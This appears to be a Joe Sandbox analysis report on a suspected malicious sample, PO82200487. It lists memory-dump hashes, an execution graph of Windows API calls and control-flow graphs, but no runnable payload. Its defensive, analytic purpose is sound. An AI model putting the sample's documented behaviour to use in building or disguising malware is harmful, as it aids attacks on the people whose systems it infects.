                                              • Instruction ID: 3e1c89c54c85f0e77723c4e9ba315f1521c96d78e1af5480a7034d6fb98fd9a4
                                              • Opcode Fuzzy Hash: 6e2baeba56cbd1fcf0db6a82430aaef64aad7048d60c80ecbf3ad8aa1c0d44e1
                                              • Instruction Fuzzy Hash: E40171B4E40308EBDB04FFB9D88175D7BF2EF84700F108069D6059B294EA305A019F92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f6b5e2673db214770fbf0cc291dc3c3a637578cf4a6e97077375e62b3a47ea2
                                              • Instruction ID: 282ec0d83bc8d5c97ca1a009e680f7a7e15194dc24867956f20890cad8616ab3
                                              • Opcode Fuzzy Hash: 2f6b5e2673db214770fbf0cc291dc3c3a637578cf4a6e97077375e62b3a47ea2
                                              • Instruction Fuzzy Hash: F1F0AF3125420057EB10AF69989578673E5FF88320F144679EA09AB382DBB1684983A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1341644212.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b8d000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46592d796def0c53313533a63c8a6a6e5f614691d15d3dc6202a9a3eeff59498
                                              • Instruction ID: aac3014abdd78c7c6934d38e40c6de3bf4cf504406bf4ccd43babdb0aa98c539
                                              • Opcode Fuzzy Hash: 46592d796def0c53313533a63c8a6a6e5f614691d15d3dc6202a9a3eeff59498
                                              • Instruction Fuzzy Hash: 2CF0C275004340AEEB109F16C984B66FBD8EB51734F18C09BED080A2D6C2799C40CBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72fb34b3497c370e82714e57b1b0744a8ad860e77c08677c580982edf90bd2ab
                                              • Instruction ID: 83636b0383e09c90b5bb7f54cbf6b86d0f2821f4a4dbec0e4da433dbfbe5ea24
                                              • Opcode Fuzzy Hash: 72fb34b3497c370e82714e57b1b0744a8ad860e77c08677c580982edf90bd2ab
                                              • Instruction Fuzzy Hash: F1F02B313482440BDF067B64E4937EA3B61EF81318F1404BDE5494F697D9B65C0E8740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4202af8706aba7a0c5f1357edd18e5e8b432907c6adccce33f8ee087ee344943
                                              • Instruction ID: 3e5b2677e5041ed3730c7c1a69d8e2359c08b4721a3c0af8419832343987cbc5
                                              • Opcode Fuzzy Hash: 4202af8706aba7a0c5f1357edd18e5e8b432907c6adccce33f8ee087ee344943
                                              • Instruction Fuzzy Hash: D9F02734E78340CAE313A772F48432A3BC58712700F844C2DD45C866C2C7289A56CB12
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65fa56975c6a20f5d57ec85985d6dba56c3d8a6b3149073767a8468cb9acb8ad
                                              • Instruction ID: 12efce6660cbd4387dd7408bac9f0cae6f8a8e652101c27a1768294c94ba07a0
                                              • Opcode Fuzzy Hash: 65fa56975c6a20f5d57ec85985d6dba56c3d8a6b3149073767a8468cb9acb8ad
                                              • Instruction Fuzzy Hash: DDF0F874E21219CFDB84CF69D890A8DB3B6AB8C200F24C6A6D809A3224D73099418F14
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16a187dc8c3a6e2e3f32d1f913b239ea9e8d8e73232a25803e20affb1239c618
                                              • Instruction ID: 86ea693ace357e43a7e51b7720f2bc9131ddaa66f484530a40ad67f2ff4624d5
                                              • Opcode Fuzzy Hash: 16a187dc8c3a6e2e3f32d1f913b239ea9e8d8e73232a25803e20affb1239c618
                                              • Instruction Fuzzy Hash: E4E0C271A113188FEB04DFA5C960ACEB7F2BB49310F2081EAD109AB2A0D6308E418F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f48e19d08bc292ad71805ff80d2ab54204d226a75e1da71881a933d40700690
                                              • Instruction ID: e612f869dd162c87cdee05c299e9382a12e8efa93e00b01064da6f43228d6934
                                              • Opcode Fuzzy Hash: 6f48e19d08bc292ad71805ff80d2ab54204d226a75e1da71881a933d40700690
                                              • Instruction Fuzzy Hash: 4EF02B78A01618CFDB14CFA4CA849DDBBF2AF88311F6451A9D805B7314C735AE89CE10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa20d5cdde353843459655e2d56d9d504d50b2b1de4ab841641a2954a002f91e
                                              • Instruction ID: fbc9969db502c497cf609987cd8891876655586be9ee5bf503a6fe15139ce9de
                                              • Opcode Fuzzy Hash: fa20d5cdde353843459655e2d56d9d504d50b2b1de4ab841641a2954a002f91e
                                              • Instruction Fuzzy Hash: EED0A7B25261448FC700DB746F18B553765EB0721AF2601EED40993562DB710552D799
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc9036bdc03e69e895dc4ab5c4bfa27338d29d481aad0467a8c9c35d07bd305d
                                              • Instruction ID: b21493dec4dd28cea6014f5edea75d30ea4412f46971debae6d6ba688b2f389a
                                              • Opcode Fuzzy Hash: fc9036bdc03e69e895dc4ab5c4bfa27338d29d481aad0467a8c9c35d07bd305d
                                              • Instruction Fuzzy Hash: 15C012B24122089BCB00EBB8A908F5A77ACE70721AF1105AAE81883251EB71094096A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: m`o$m`o
                                              • API String ID: 0-2332208288
                                              • Opcode ID: 2d163591589c03f32a3082b7b04917beea41a2d7b4f572e6c28bf2a1c8b67b65
                                              • Instruction ID: e923a9a02f757b7c7404a974a15787e518ee72e579b19d8b668b16c5a301adca
                                              • Opcode Fuzzy Hash: 2d163591589c03f32a3082b7b04917beea41a2d7b4f572e6c28bf2a1c8b67b65
                                              • Instruction Fuzzy Hash: 567106B4E1461ADFCB08CF99D5809AEFBB2FF88310F24951AD415AB310C735AA42CF95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: m`o$m`o
                                              • API String ID: 0-2332208288
                                              • Opcode ID: eaa7ae1ab78a7c1320fc366dced580248772f519357f244392871c1f8ceb5b5b
                                              • Instruction ID: 19685ec9238066bae42efb44abb13393826600b82a179cf54d64470891b8e55a
                                              • Opcode Fuzzy Hash: eaa7ae1ab78a7c1320fc366dced580248772f519357f244392871c1f8ceb5b5b
                                              • Instruction Fuzzy Hash: 706118B4E1460ADFCB08CF99D5809AEFBB2FF88310F24855AD415A7320D335AA42CF95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355973314.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ef0000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c8e3cc20b2bb77f83960257fc0fd55d2c3bd0a55911013c6216f260eda17a88
                                              • Instruction ID: e300e21b1d864245bffabfcb4f9bb1eff10a6cab02ef306db609579c9b683977
                                              • Opcode Fuzzy Hash: 7c8e3cc20b2bb77f83960257fc0fd55d2c3bd0a55911013c6216f260eda17a88
                                              • Instruction Fuzzy Hash: 0CE1F3F4E012198FDB14DFA9C580AAEFBB2FB89305F248169D514AB755D730AD81CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355973314.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ef0000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bafc0e8c9c2d7702ed7776d4e5464c270283bca75752a8f32fa873ffcfb6604
                                              • Instruction ID: a65ada6afd98aa2c66f4997ce27feb47a6ae45145f6047c8e321db6d46547135
                                              • Opcode Fuzzy Hash: 3bafc0e8c9c2d7702ed7776d4e5464c270283bca75752a8f32fa873ffcfb6604
                                              • Instruction Fuzzy Hash: 6AE117B4E012198FDB14DFA9C580AAEFBB2FF89305F248169D554AB356D730AD81CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fafc5ce5a598eb34f494b6b7311ca828b19651ddeaf211fb914cbddad221ef5
                                              • Instruction ID: 0af9c0af17298731c907a02e605c060d8c8cff0cadfaf0be52418d067ba4602c
                                              • Opcode Fuzzy Hash: 0fafc5ce5a598eb34f494b6b7311ca828b19651ddeaf211fb914cbddad221ef5
                                              • Instruction Fuzzy Hash: E991E274A1521ACFCB48CF99C58499EFBF1FF89310F24956AE415AB224D330AA42CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc0d87c02f2a7aebc0b6634bac5af4e67150c8197417946831c0ff2ac7e851ef
                                              • Instruction ID: 51e4948dbfacb09cc9654035951bd9e86258a344695438985454fdac998ab950
                                              • Opcode Fuzzy Hash: fc0d87c02f2a7aebc0b6634bac5af4e67150c8197417946831c0ff2ac7e851ef
                                              • Instruction Fuzzy Hash: 0681E374A1520ACFCB48CFA9C98499EFBF1FF89310F24956AD415AB324D370AA42CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0295542ed6f13079a5cf47255add4f8c2212e265833ebd2b7eda834ba385ad50
                                              • Instruction ID: afefb189b5a4f221f011ca4fbc74bfdb6edaaeff66fb89ab10024bdca7d00b29
                                              • Opcode Fuzzy Hash: 0295542ed6f13079a5cf47255add4f8c2212e265833ebd2b7eda834ba385ad50
                                              • Instruction Fuzzy Hash: 4071E474E15609CFCB08CFAAC5805EEFBF2FF88310F24952AD415BB264D7309A428B65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c5b1d727e27873ff0448c8f2d675b3ff231ddb7ef67efcc577fae104feba6f5
                                              • Instruction ID: e4ab82f5c9e8e9c59998bd39b617c88e3acff554bf9d508060344c1340c5560b
                                              • Opcode Fuzzy Hash: 0c5b1d727e27873ff0448c8f2d675b3ff231ddb7ef67efcc577fae104feba6f5
                                              • Instruction Fuzzy Hash: B471F474E15609CFCB08CFAAC5805EEFBF2EF89310F24956AD415BB264D7309A428B65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d4bb4119649276d940da17483f60116bc142587dc2a6cb5b49ce07015bc34dd
                                              • Instruction ID: 05193ba2d43e03bdecbc4833b75badd2987707d524486ccefcf93ea63466a2e5
                                              • Opcode Fuzzy Hash: 2d4bb4119649276d940da17483f60116bc142587dc2a6cb5b49ce07015bc34dd
                                              • Instruction Fuzzy Hash: 844114B0E156099FCB08CFAAC9415AEFBF2BF89304F24D56AC419B7215D3349A418FA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af2afe834490c3cc49b2c10f43b6026f615d06f40cbc5f1b1c0aa3f8b851d484
                                              • Instruction ID: 06db63b9b4831f2d6f7ab9df6d7582712283e5fa7d5273a9aa8e3e78b7aa31c5
                                              • Opcode Fuzzy Hash: af2afe834490c3cc49b2c10f43b6026f615d06f40cbc5f1b1c0aa3f8b851d484
                                              • Instruction Fuzzy Hash: 1241F5B0E14609DBDF08CFAAC9415EEFBF2BB88304F24D56AC419B7214D7349A418FA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb7dd7f6b883ce3489a0a62797a4aca142cfeb150c18efd5dcd4716a9e194d7b
                                              • Instruction ID: f9500402642c3c3eb88afa354412aa5a854dc0cb3e888469e7dea63abc4b029c
                                              • Opcode Fuzzy Hash: eb7dd7f6b883ce3489a0a62797a4aca142cfeb150c18efd5dcd4716a9e194d7b
                                              • Instruction Fuzzy Hash: F641E2B0E24609CFDB48DFAAC5815AEFBF2BB89300F24C46AD415B7214D7349A418F94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23b6f732ff207a91c3f99039db19af73de13988eb854a3d1ca0b86759e5e912f
                                              • Instruction ID: f23c92130c9d1a11f3195b38b137e3e6020d9d633d002057eb0fbd4939d50c23
                                              • Opcode Fuzzy Hash: 23b6f732ff207a91c3f99039db19af73de13988eb854a3d1ca0b86759e5e912f
                                              • Instruction Fuzzy Hash: A541F6B0E24609CFDB48CFAAC9815AEFBF2BF89300F64C46AD415B7254D7349A419F94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ab478ee53b625795dcc2f910ecea3409e682b00aa538fdf371eeb96fcca70f
                                              • Instruction ID: 413b06de179cad3def14020c52269c344521b83002acec429626beaff5c5c628
                                              • Opcode Fuzzy Hash: f4ab478ee53b625795dcc2f910ecea3409e682b00aa538fdf371eeb96fcca70f
                                              • Instruction Fuzzy Hash: 3321BE71E156188FEB58CF6BDC0069EF6F3ABC8300F18C07AC918A6264DB3405558F55

                                              Execution Graph

                                              Execution Coverage:11.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:95
                                              Total number of Limit Nodes:7
                                              execution_graph 41344 15cae98 DuplicateHandle 41345 15caf2e 41344->41345 41346 6af57f8 41347 6af5820 41346->41347 41350 6af584c 41346->41350 41348 6af5829 41347->41348 41351 6af4cbc 41347->41351 41352 6af4cc7 41351->41352 41353 6af5b43 41352->41353 41355 6af4cd8 41352->41355 41353->41350 41356 6af5b78 OleInitialize 41355->41356 41357 6af5bdc 41356->41357 41357->41353 41366 15cb4b0 41368 15cb4b1 41366->41368 41370 15ca9ec 41368->41370 41369 15cb4fe 41369->41369 41372 15ca9f7 41370->41372 41371 15cbc5c 41373 15cbcb7 41371->41373 41388 6af5d85 41371->41388 41393 6af5d90 41371->41393 41372->41371 41372->41373 41378 15ce8a0 41372->41378 41383 15ce891 41372->41383 41373->41369 41379 15ce8c1 41378->41379 41380 15ce8e5 41379->41380 41397 15cea3f 41379->41397 41401 15cea50 41379->41401 41380->41371 41384 15ce898 41383->41384 41385 15ce8e5 41384->41385 41386 15cea3f 3 API calls 41384->41386 41387 15cea50 3 API calls 41384->41387 41385->41371 41386->41385 41387->41385 41389 6af5d69 41388->41389 41392 6af5d8e 41388->41392 41389->41373 41390 6af6258 WaitMessage 41390->41392 41391 6af5e42 41391->41373 41392->41390 41392->41391 41395 6af5df5 41393->41395 41394 6af6258 WaitMessage 41394->41395 41395->41394 41396 6af5e42 41395->41396 41396->41373 41398 15cea5d 41397->41398 41399 15cea96 41398->41399 41405 15ccdac 41398->41405 41399->41380 41402 15cea5d 41401->41402 41403 15cea96 41402->41403 41404 15ccdac 3 API calls 41402->41404 41403->41380 41404->41403 41406 15ccdb7 41405->41406 41408 15ceb08 41406->41408 41409 15ccde0 41406->41409 41408->41408 41410 15ccdeb 41409->41410 41414 69edd38 41410->41414 41420 69edd20 41410->41420 41411 15cefb1 41411->41408 41416 69edd69 41414->41416 41417 69eddb5 41414->41417 41415 69edd75 41415->41411 41416->41415 41425 69edfb0 41416->41425 41429 69edfa1 41416->41429 41417->41411 41421 69edd2c 41420->41421 41422 69edd75 41421->41422 41423 69edfb0 3 API calls 41421->41423 41424 69edfa1 3 API calls 41421->41424 41422->41411 41423->41422 41424->41422 41435 69ee210 41425->41435 41444 69ee220 41425->41444 41426 69edfba 41426->41417 41430 69edfaa 41429->41430 41431 69edf4b 41429->41431 41432 69edfb6 41430->41432 41433 69ee210 2 API calls 41430->41433 41434 69ee220 2 API calls 41430->41434 41431->41417 41432->41417 41433->41432 41434->41432 41436 69ee214 41435->41436 41439 69ee254 41436->41439 41453 69ece2c 41436->41453 41439->41426 41440 69ee458 GetModuleHandleW 41442 69ee485 41440->41442 41441 69ee24c 41441->41439 41441->41440 41442->41426 41445 69ee231 41444->41445 41448 69ee254 41444->41448 41446 69ece2c GetModuleHandleW 41445->41446 41447 69ee23c 41446->41447 41447->41448 41452 69ee640 GetModuleHandleW 41447->41452 41448->41426 41449 69ee24c 41449->41448 41450 69ee458 GetModuleHandleW 41449->41450 41451 69ee485 41450->41451 41451->41426 41452->41449 41454 69ee410 GetModuleHandleW 41453->41454 41456 69ee23c 41454->41456 41456->41439 41457 69ee640 41456->41457 41458 69ee644 41457->41458 41459 69ece2c GetModuleHandleW 41458->41459 41460 69ee664 41459->41460 41460->41441 41358 6af3530 41359 6af3572 41358->41359 41361 6af3579 41358->41361 41360 6af35ca CallWindowProcW 41359->41360 41359->41361 41360->41361 41362 6af0f70 41363 6af0fd8 CreateWindowExW 41362->41363 41365 6af1094 41363->41365

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2125 6af5d90-6af5df3 2126 6af5df5-6af5e1f 2125->2126 2127 6af5e22-6af5e40 2125->2127 2126->2127 2132 6af5e49-6af5e80 2127->2132 2133 6af5e42-6af5e44 2127->2133 2137 6af5e86-6af5e9a 2132->2137 2138 6af62b1 2132->2138 2134 6af6302-6af6317 2133->2134 2139 6af5e9c-6af5ec6 2137->2139 2140 6af5ec9-6af5ee8 2137->2140 2141 6af62b6-6af62cc 2138->2141 2139->2140 2147 6af5eea-6af5ef0 2140->2147 2148 6af5f00-6af5f02 2140->2148 2141->2134 2152 6af5ef4-6af5ef6 2147->2152 2153 6af5ef2 2147->2153 2149 6af5f04-6af5f1c 2148->2149 2150 6af5f21-6af5f2a 2148->2150 2149->2141 2154 6af5f32-6af5f39 2150->2154 2152->2148 2153->2148 2155 6af5f3b-6af5f41 2154->2155 2156 6af5f43-6af5f4a 2154->2156 2157 6af5f57-6af5f6d call 6af4d38 2155->2157 2158 6af5f4c-6af5f52 2156->2158 2159 6af5f54 2156->2159 2161 6af5f72-6af5f74 2157->2161 2158->2157 2159->2157 2162 6af5f7a-6af5f81 2161->2162 2163 6af60c9-6af60cd 2161->2163 2162->2138 2166 6af5f87-6af5fc4 2162->2166 2164 6af629c-6af62af 2163->2164 2165 6af60d3-6af60d7 2163->2165 2164->2141 2167 6af60d9-6af60ec 2165->2167 2168 6af60f1-6af60fa 2165->2168 2174 6af5fca-6af5fcf 2166->2174 2175 6af6292-6af6296 2166->2175 2167->2141 2169 6af60fc-6af6126 2168->2169 2170 6af6129-6af6130 2168->2170 2169->2170 2172 6af61cf-6af61e4 2170->2172 2173 6af6136-6af613d 2170->2173 2172->2175 2189 6af61ea-6af61ec 2172->2189 2179 6af613f-6af6169 2173->2179 2180 6af616c-6af618e 2173->2180 2176 6af6001-6af6016 call 6af4d5c 2174->2176 2177 6af5fd1-6af5fdf call 6af4d44 2174->2177 2175->2154 2175->2164 2187 6af601b-6af601f 2176->2187 2177->2176 2190 6af5fe1-6af5fff call 6af4d50 2177->2190 2179->2180 2180->2172 2215 6af6190-6af619a 2180->2215 2191 6af6021-6af6033 call 6af4d68 2187->2191 2192 6af6090-6af609d 2187->2192 2193 6af61ee-6af6227 2189->2193 2194 6af6239-6af6256 call 6af4d38 2189->2194 2190->2187 2219 6af6035-6af6065 2191->2219 2220 6af6073-6af608b 2191->2220 2192->2175 2207 6af60a3-6af60ad call 6af4d78 2192->2207 2210 6af6229-6af622f 2193->2210 2211 6af6230-6af6237 2193->2211 2194->2175 2206 6af6258-6af6284 WaitMessage 2194->2206 2212 6af628b 2206->2212 2213 6af6286 2206->2213 2221 6af60af-6af60b7 call 6af4d84 2207->2221 2222 6af60bc-6af60c4 call 6af4d90 2207->2222 2210->2211 2211->2175 2212->2175 2213->2212 2227 6af619c-6af61a2 2215->2227 2228 6af61b2-6af61cd 2215->2228 2232 6af606c 2219->2232 2233 6af6067 2219->2233 2220->2141 2221->2175 2222->2175 2230 6af61a6-6af61a8 2227->2230 2231 6af61a4 2227->2231 2228->2172 2228->2215 2230->2228 2231->2228 2232->2220 2233->2232
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24dbf63b8fcdd4e7978857b844e756ff28bcd3e095bb9856cd50b34df546924c
                                              • Instruction ID: 6ac72eb90ab7918c62dc7f4f4db93bab7c1825f5cba732b8f8516e65e323659c
                                              • Opcode Fuzzy Hash: 24dbf63b8fcdd4e7978857b844e756ff28bcd3e095bb9856cd50b34df546924c
                                              • Instruction Fuzzy Hash: 16F15A30E10209CFEB54EFE5C948B9DBBF1BF88304F158168E519AF2A5DB71A845CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1217 6af0f64-6af0fd6 1219 6af0fd8-6af0fde 1217->1219 1220 6af0fe1-6af0fe8 1217->1220 1219->1220 1221 6af0fea-6af0ff0 1220->1221 1222 6af0ff3-6af102b 1220->1222 1221->1222 1223 6af1033-6af1092 CreateWindowExW 1222->1223 1224 6af109b-6af10d3 1223->1224 1225 6af1094-6af109a 1223->1225 1229 6af10d5-6af10d8 1224->1229 1230 6af10e0 1224->1230 1225->1224 1229->1230 1231 6af10e1 1230->1231 1231->1231
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF1082
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572564108.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_6af0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID: d
                                              • API String ID: 716092398-2564639436
                                              • Opcode ID: 1fec8f82a24aa8eea5c6d49d1f29c63ed24e4fc36ebb0be2a1b33484fea50f94
                                              • Instruction ID: e6df0a9fe24aaa85f507871b0981ed7c49ba3961d47acadda6ca123af9588dd9
                                              • Opcode Fuzzy Hash: 1fec8f82a24aa8eea5c6d49d1f29c63ed24e4fc36ebb0be2a1b33484fea50f94
                                              • Instruction Fuzzy Hash: 5551C0B1D10349EFDB14DFA9C884ADEBFB6BF48310F24812AE918AB250D7759845CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2422 69ee220-69ee22f 2423 69ee25b-69ee25f 2422->2423 2424 69ee231-69ee23e call 69ece2c 2422->2424 2426 69ee273-69ee2b4 2423->2426 2427 69ee261-69ee26b 2423->2427 2429 69ee254 2424->2429 2430 69ee240-69ee24e call 69ee640 2424->2430 2433 69ee2b6-69ee2be 2426->2433 2434 69ee2c1-69ee2cf 2426->2434 2427->2426 2429->2423 2430->2429 2440 69ee390-69ee450 2430->2440 2433->2434 2435 69ee2f3-69ee2f5 2434->2435 2436 69ee2d1-69ee2d6 2434->2436 2441 69ee2f8-69ee2ff 2435->2441 2438 69ee2d8-69ee2df call 69ece38 2436->2438 2439 69ee2e1 2436->2439 2445 69ee2e3-69ee2f1 2438->2445 2439->2445 2472 69ee458-69ee483 GetModuleHandleW 2440->2472 2473 69ee452-69ee455 2440->2473 2443 69ee30c-69ee313 2441->2443 2444 69ee301-69ee309 2441->2444 2448 69ee315-69ee31d 2443->2448 2449 69ee320-69ee329 2443->2449 2444->2443 2445->2441 2448->2449 2452 69ee32b-69ee333 2449->2452 2453 69ee336-69ee33b 2449->2453 2452->2453 2455 69ee33d-69ee344 2453->2455 2456 69ee359-69ee35d 2453->2456 2455->2456 2457 69ee346-69ee356 call 69ecc90 call 69ece48 2455->2457 2478 69ee360 call 69ef118 2456->2478 2479 69ee360 call 69ef108 2456->2479 2457->2456 2460 69ee363-69ee366 2462 69ee368-69ee386 2460->2462 2463 69ee389-69ee38f 2460->2463 2462->2463 2474 69ee48c-69ee4a0 2472->2474 2475 69ee485-69ee48b 2472->2475 2473->2472 2475->2474 2478->2460 2479->2460
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2572470309.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_69e0000_PO82200487.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 8f571b3c93dc444d45f4d23813f312b4b29cc9134b40d9ecc09698d5b58ab403
